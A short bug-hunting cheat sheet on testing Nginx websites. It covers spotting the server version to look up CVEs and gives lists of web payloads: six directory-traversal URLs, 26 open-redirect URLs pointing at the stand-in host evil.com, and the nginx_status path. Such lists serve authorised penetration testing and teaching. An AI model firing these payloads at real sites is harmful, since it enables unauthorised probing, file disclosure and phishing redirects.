Nginx Common Bugs
Introduction
What would you do if you came across a website that uses Nginx?
How to Detect
Usually in the HTTP response there is a header like this Server: nginx
- Find the related CVE by checking nginx version
- How to find the nginx version
By checking the response header or using 404 page, sometimes the version is printed there. If you found outdated nginx version, find the CVEs at CVE Details
- Directory traversal
1 2 3 4 5 6
https://example.com/folder1../folder1/folder2/static/main.css https://example.com/folder1../%s/folder2/static/main.css https://example.com/folder1/folder2../folder2/static/main.css https://example.com/folder1/folder2../%s/static/main.css https://example.com/folder1/folder2/static../static/main.css https://example.com/folder1/folder2/static../%s/main.css
- Open redirect This is because of misconfiguration
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26
https://example.com/%5cevil.com https://example.com////\;@evil.com https://example.com////evil.com https://example.com///evil.com https://example.com///evil.com/%2f%2e%2e https://example.com///evil.com@// https://example.com///evil.com/%2f%2e%2e https://example.com//;@evil.com https://example.com//\/evil.com/ https://example.com//\@evil.com https://example.com//\evil.com https://example.com//\tevil.com/ https://example.com//evil.com/%2F.. https://example.com//evil.com// https://example.com//evil.com@// https://example.com//evil.com\tevil.com/ https://example.com//https://evil.com@// https://example.com/<>//evil.com https://example.com/\/\/evil.com/ https://example.com/\/evil.com https://example.com/\evil.com https://example.com/evil.com https://example.com/evil.com/%2F.. https://example.com/evil.com/ https://example.com/evil.com/..;/css https://example.com/https:evil.com
- Nginx status page
1
https://example.com/nginx_status
Comments powered by Disqus.